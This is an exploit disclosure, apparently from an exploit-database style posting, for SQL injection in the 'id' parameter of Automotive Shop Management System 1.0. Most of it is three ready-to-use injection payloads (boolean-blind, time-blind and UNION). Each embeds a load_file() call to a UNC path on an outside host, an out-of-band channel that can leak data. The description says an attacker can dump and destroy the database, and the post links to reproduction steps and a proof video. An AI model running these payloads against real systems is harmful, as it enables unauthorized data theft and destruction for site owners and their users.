## Author: nu11secur1ty
## Date: 12.03.2022
## Vendor: https://github.com/oretnom23,
https://www.sourcecodester.com/users/tips23
## Software: https://www.sourcecodester.com/download-code?nid=15312&title=Automotive+Shop+Management+System+in+PHP%2FOOP+Free+Source+Code
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/ASMS-1.0
## Description:
The `id` parameter appears to be vulnerable to SQL injection attacks.
The attacker can dump all database information without any problems,
and then he can destroy this system, it is depending
from the scenario.
## STATUS: Critically awful
[+] Payload:
“`MySQL
—
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind – WHERE or HAVING clause (NOT)
Payload: id=7’+(select
load_file(‘\\q3ui0l0datyx3tg6cov4tj0tpkvdj69u0xoobez3.stupid.com\aze’))+”
OR NOT 9828=9828 AND ‘NWsG’=’NWsG
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=7’+(select
load_file(‘\\q3ui0l0datyx3tg6cov4tj0tpkvdj69u0xoobez3.stupid.com\aze’))+”
AND (SELECT 9682 FROM (SELECT(SLEEP(5)))Oifb) AND ‘zARc’=’zARc
Type: UNION query
Title: MySQL UNION query (NULL) – 8 columns
Payload: id=7’+(select
load_file(‘\\q3ui0l0datyx3tg6cov4tj0tpkvdj69u0xoobez3.stupid.com\aze’))+”
UNION ALL SELECT
NULL,CONCAT(0x7176626271,0x71504455436c68624e7878795354674d76627a4b4164756a4c46537651584b67584d744963504b5a,0x716a6b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
—
“`
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/ASMS-1.0)
## Proof and Exploit:
[href](https://streamable.com/c5v75u)
## Time spent
`00:27:00`
## Time attack
`00:01:57`
